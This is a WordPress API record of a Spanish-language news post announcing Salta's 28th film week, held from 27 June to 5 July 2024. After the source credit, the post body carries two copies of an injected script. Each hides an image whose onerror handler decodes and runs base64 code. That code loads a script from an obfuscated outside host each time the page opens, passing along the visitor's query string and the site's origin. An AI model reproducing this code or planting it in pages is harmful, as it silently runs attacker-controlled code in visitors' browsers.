{"id":4116,"date":"2024-06-18T11:45:16","date_gmt":"2024-06-18T14:45:16","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4116"},"modified":"2025-08-13T23:54:11","modified_gmt":"2025-08-14T02:54:11","slug":"salta-pronto-vivira-su-semana-de-cine","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4116","title":{"rendered":"Salta pronto vivir\u00e1 su Semana de Cine"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-10cb840ecfa147276db9e4cde300ee33\" style=\"background-color:#91072a\"><em>Ma\u00f1ana la Secretar\u00eda de Cultura de la Provincia de Salta y la Direcci\u00f3n de Audiovisuales lanzar\u00e1 la 28\u00ba Semana de Cine en Salta, que se desarrollar\u00e1 del 27 de junio al 5 de julio.<\/em><\/h3>\n\n\n\n<p>La presentaci\u00f3n oficial de la Semana de Cine se realizar\u00e1 el mi\u00e9rcoles 19 de junio a las 11 horas en el Hall del auditorio Macacha G\u00fcemes, ubicado en la Usina Cultural en la calle Espa\u00f1a y Juramento, ciudad de Salta.<\/p>\n\n\n\n<p>En 2024, la Semana de Cine en Salta celebrar\u00e1 su 28\u00ba edici\u00f3n, llev\u00e1ndose a cabo del 27 de junio al 5 de julio en diversos espacios culturales de la provincia. Durante m\u00e1s de veinte a\u00f1os, esta muestra ha sido uno de los eventos culturales m\u00e1s destacados de Salta. Su objetivo es exhibir una selecci\u00f3n de cine local, nacional e internacional de alta calidad para generar un espacio de encuentro cinematogr\u00e1fico y formaci\u00f3n audiovisual.&nbsp;<\/p>\n\n\n\n<p>Este a\u00f1o, la Semana de Cine estar\u00e1 dirigida a un p\u00fablico amplio, que podr\u00e1 disfrutar de una variada programaci\u00f3n de actividades, estrenos de pel\u00edculas y la presencia de importantes invitados de renombre internacional. La propuesta incluir\u00e1 proyecciones, talleres, charlas y mesas redondas, fomentando as\u00ed el intercambio de conocimientos y experiencias en el \u00e1mbito audiovisual.<\/p>\n\n\n\n<p>Durante el lanzamiento se dar\u00e1n a conocer todos los detalles de la programaci\u00f3n, los invitados especiales y las actividades previstas para esta semana dedicada al cine.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-pronto-vivira-su-semana-de-cine-96261\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana la Secretar\u00eda de Cultura de la Provincia de Salta y la Direcci\u00f3n de Audiovisuales lanzar\u00e1 la 28\u00ba Semana de Cine en Salta, que se desarrollar\u00e1 del 27 de junio al 5 de julio. La presentaci\u00f3n oficial de la Semana de Cine se realizar\u00e1 el mi\u00e9rcoles 19 de junio a las 11 horas en el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4117,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[23],"tags":[],"class_list":{"0":"post-4116","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-audio-visuales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4116"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4116"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4116\/revisions"}],"predecessor-version":[{"id":6761,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4116\/revisions\/6761"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4117"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4116"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4116"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}